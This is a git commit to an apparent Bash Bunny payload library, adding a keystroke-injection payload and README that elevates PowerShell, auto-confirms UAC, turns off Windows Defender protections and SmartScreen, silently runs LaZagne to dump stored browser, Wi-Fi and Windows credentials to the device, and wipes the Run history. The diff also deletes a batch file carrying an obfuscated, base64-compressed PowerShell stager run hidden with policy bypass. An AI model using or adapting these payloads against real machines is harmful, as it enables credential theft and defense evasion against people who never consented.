Added NoDefenseAgainstLaZagne payload to credentials lib on for Bash Bunny

pull/691/head
Rafa Guillermo 2024-09-29 17:06:22 +02:00
parent 8d901a02a8
commit 6a260cfd4b
4 changed files with 132 additions and 2 deletions

View File

@ -0,0 +1,5 @@
$dest = ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'loot\PasswordGrabber')
$filter = 'password_'+ $env:COMPUTERNAME
$filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1)
Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'tooling\LaZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt')
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue

View File

@ -0,0 +1,89 @@
#!/bin/bash
#
# Title: Disable Windows Defender and Exfil stored passwords
# Description: Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more...
# This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack.
# This payload makes use of AleZssandroZ awesome LaZagne password recovery tool as well as the Password Grabber by jdebetaz.
# Author: rafa-guillermo
# Props: Hak5Darren, AlessandroZ, TeCHemically, dragmus13, RazerBlade, jdebetaz
# Version: 1.2
# Category: Credentials
# Target: Windows
# Tested On: Windows 11
# Attackmodes: HID, STORAGE
# Options
LOOTDIR=/root/udisk/loot/PasswordGrabber
######## Set-up ########
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
######## Make Loot Dir ########
# Setup named logs in loot directory
mkdir -p $LOOTDIR
####### Open a powershell window with elevated privileges #######
LED STAGE1
RUN WIN "powershell -Command \"Start-Process powershell -Verb RunAs\""
sleep 3 # wait for UAC prompt
QUACK ALT y
sleep 2
# Disable Windows Defender File Scan and and Real Time Protection
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value Off -Force
QUACK ENTER
QUACK STRING Set-ItemProperty -Path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value Off -Force
QUACK ENTER
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Edge -Name SmartScreenEnabled -Value Off -Force
QUACK ENTER
QUACK STRING Set-MpPreference -DisableRealtimeMonitoring \$true
QUACK ENTER
QUACK STRING Set-MpPreference -DisableIOAVProtection \$true
QUACK ENTER
QUACK STRING Set-MpPreference -DisableBehaviorMonitoring \$true
QUACK ENTER
QUACK STRING Set-MpPreference -DisableScriptScanning \$true
QUACK ENTER
sleep 1
# Run laZagne
LED STAGE2
QUACK STRING "\$bashBunnyDrive = (Get-WmiObject -Query \"SELECT * FROM Win32_Volume WHERE Label='BashBunny'\" | Select-Object -ExpandProperty DriveLetter)"
QUACK ENTER
QUACK STRING "\$scriptPath = \"\$bashBunnyDrive\\payloads\\switch1\\payload.ps1\""
QUACK ENTER
QUACK STRING \& \$scriptPath
QUACK ENTER
sleep 10
QUACK STRING exit
QUACK ENTER
# Re-enable Defender and Smart screen
LED CLEANUP
RUN WIN "powershell -Command \"Start-Process powershell -Verb RunAs\""
sleep 3 # wait for UAC prompt
QUACK ALT y
sleep 2
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value On -Force
QUACK ENTER
QUACK STRING Set-ItemProperty -Path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value On -Force
QUACK ENTER
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Edge -Name SmartScreenEnabled -Value On -Force
QUACK ENTER
QUACK STRING Set-MpPreference -DisableRealtimeMonitoring \$false
QUACK ENTER
QUACK STRING Set-MpPreference -DisableIOAVProtection \$false
QUACK ENTER
QUACK STRING Set-MpPreference -DisableBehaviorMonitoring \$false
QUACK ENTER
QUACK STRING Set-MpPreference -DisableScriptScanning \$false
QUACK ENTER
sleep 1
QUACK STRING exit
QUACK ENTER
######## FINISH ########
LED FINISH

View File

@ -0,0 +1,38 @@
# NoDefenseAgainstLaZagne
* Author: [rafa-guillermo](https://github.com/rafa-guillermo)
* Creds: [Hak5Darren](https://github.com/hak5darren), [AlessandroZ](https://github.com/AlessandroZ), TeCHemically, dragmus13, RazerBlade, jdebetaz
* Version: 1.0
* Frimware support: 1.1 and higher
* Target version: Windows 11
* Tested on: Windows 11
## Description
Disables Windows defender and runs LaZagne to grab passwords from the host system from apps like: chrome, internet explorer, firefox, filezilla and more. Wifi passwords and Win password hashes included. This payload is quick, but opens up an ugly PS terminal which can probably be obfuscated. This payload springboards off of AleZssandroZ's LaZagne password recovery tool as well as the Password Grabber by jdebetaz.
Full read here: [LaZagne Repository](https://github.com/AlessandroZ/LaZagne)
Password grabber: [Also in this repo](https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/PasswordGrabber)
## Configuration
1. You need to download LaZagne from the [LaZagne release page](https://github.com/AlessandroZ/LaZagne/releases). Tested with LaZagne 2.2 but might work with newer versions too.
2. Unzip the exe file and place it in the folder called 'tooling' on the root of the Bash Bunny. The payload folder should contain payload.ps1 and payload.txt, LaZagne.exe needs to be in a folder called tooling.
3. Plug your BashBunny and Enjoy
## Info
rafa-guillermo: added a whole bunch of stuff to disable Windows Defender file scanner, smart screen and RTP before running LaZagne, i was having issues where otherwise it would immediately be quarantined.
jdebetaz: I remake this playload with the Payload Best Practice / Style Guide
RazerBlade: By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder.
## Disclaimer
__Hak5 and playload's contributors are not responsible for the execution of 3rd party binaries.__
## Led status
| LED | Status |
|-----------------------------------------------|--------|
| Magenta solid | Setup |
| Yellow single blink | Attack |
| Green 1000ms VERYFAST blink followed by SOLID | Finish |

View File

@ -1,2 +0,0 @@
@echo off
if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVRtb9pIEP7OrxhZe5KtYMcELpdgRSqF5pq7QnMhTXqH0GmxB7xlveus17yE8t9vTFySfj0JeZnx7DzPzDxj9gRX8M5pTAZS3mS5NtZ1lmgUyvZZkEjpeFPIy5kUMRSWWzpwY+k93Ch7aw08CGNLLntS6titfTLvJYnBomhCKZSFZD0Wz1gb85dYSqXV/TZ/dd8abTG2XvS/ufQNcov3KR3JK5cXu2etEbPS4htSlsfLF2bHYPIZe2R/dN9ywzMkrOPlAxaVcC354m3kC9pNQmU47xrWbHcsoQ47vff9wYfr3z/e/PHnp+Ho8+1fd+P7Lw+PX//+h8/iBOeLVHxbykzp/MkUtlytN9vnsHXW7vx6/tvFpRPc637KTc8YvnW9xrxUcYUOsctW3g4M2pL64LoTYjeZToGtfr4B32GIvCgN+p9n36jN4I/LzAvoAb9AuGmFIfj4BJdn3v41u4Udm1fsnagVBO3vc03FxamvDyno3ckVsGTiLtD6hqtEZ+BnfCMyysqS4BOqhU296T6q+bF59CY7wg5yo2NqNewmvCI6ZRuCo8cJsH/3EaBKiMKG2BekhhoXdq7C9Q/j7oDrBYq04Hr7/RuAxQ6IMbhMXIURE+BLC+cd+ndy4u1YSkg2YssKMCEEjADqAumKBEF8lxRXVAFpxUhGIObgUs8Lz4Nj1ymCYGvDuVx9/eJQmZMR2mCMZiVivNU0liFXfIFm2u1WXjR9NFbMBW0CPnApkoOc+lzKGcmSMHfMmhL3EcvIGFHB9eDG28JiFlTpH3HWlwKVjRosCz6S8NAUAcnXdcoCjU94yjpNcIb6WUjJTztBSPx1lhPYTFLFw/HNBzgPWhE8CurjuoDRved4EVMEuohg8n5r8SCovGpDFgz0WknNkwG33HVSa/Oie3raCoMfv+5Fp9M+ZcoBr8E0XSI6frXoJA3MZmgGOBdKHAbEnsAf0WKBQ+jtMwd8RVaR8xjh4LmuR1mAn/OisKkpG2xzxXS3+9OHJ2yyvJZbM9y0wzCkoxN60aTu1l2prMgwoD1Fo/N6LkUw5KZIuaSh9HW+dVnehLAJk5d1nrpsQ2tERvvM9bwmHEGq0ujK2+8NITbZplkdYbVuurS+KiVp5vBN8ccSMaetw1iTqC/OO2G4p9nH6W7/Hw==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();") else (%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVRtb9pIEP7OrxhZe5KtYMcELpdgRSqF5pq7QnMhTXqH0GmxB7xlveus17yE8t9vTFySfj0JeZnx7DzPzDxj9gRX8M5pTAZS3mS5NtZ1lmgUyvZZkEjpeFPIy5kUMRSWWzpwY+k93Ch7aw08CGNLLntS6titfTLvJYnBomhCKZSFZD0Wz1gb85dYSqXV/TZ/dd8abTG2XvS/ufQNcov3KR3JK5cXu2etEbPS4htSlsfLF2bHYPIZe2R/dN9ywzMkrOPlAxaVcC354m3kC9pNQmU47xrWbHcsoQ47vff9wYfr3z/e/PHnp+Ho8+1fd+P7Lw+PX//+h8/iBOeLVHxbykzp/MkUtlytN9vnsHXW7vx6/tvFpRPc637KTc8YvnW9xrxUcYUOsctW3g4M2pL64LoTYjeZToGtfr4B32GIvCgN+p9n36jN4I/LzAvoAb9AuGmFIfj4BJdn3v41u4Udm1fsnagVBO3vc03FxamvDyno3ckVsGTiLtD6hqtEZ+BnfCMyysqS4BOqhU296T6q+bF59CY7wg5yo2NqNewmvCI6ZRuCo8cJsH/3EaBKiMKG2BekhhoXdq7C9Q/j7oDrBYq04Hr7/RuAxQ6IMbhMXIURE+BLC+cd+ndy4u1YSkg2YssKMCEEjADqAumKBEF8lxRXVAFpxUhGIObgUs8Lz4Nj1ymCYGvDuVx9/eJQmZMR2mCMZiVivNU0liFXfIFm2u1WXjR9NFbMBW0CPnApkoOc+lzKGcmSMHfMmhL3EcvIGFHB9eDG28JiFlTpH3HWlwKVjRosCz6S8NAUAcnXdcoCjU94yjpNcIb6WUjJTztBSPx1lhPYTFLFw/HNBzgPWhE8CurjuoDRved4EVMEuohg8n5r8SCovGpDFgz0WknNkwG33HVSa/Oie3raCoMfv+5Fp9M+ZcoBr8E0XSI6frXoJA3MZmgGOBdKHAbEnsAf0WKBQ+jtMwd8RVaR8xjh4LmuR1mAn/OisKkpG2xzxXS3+9OHJ2yyvJZbM9y0wzCkoxN60aTu1l2prMgwoD1Fo/N6LkUw5KZIuaSh9HW+dVnehLAJk5d1nrpsQ2tERvvM9bwmHEGq0ujK2+8NITbZplkdYbVuurS+KiVp5vBN8ccSMaetw1iTqC/OO2G4p9nH6W7/Hw==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();")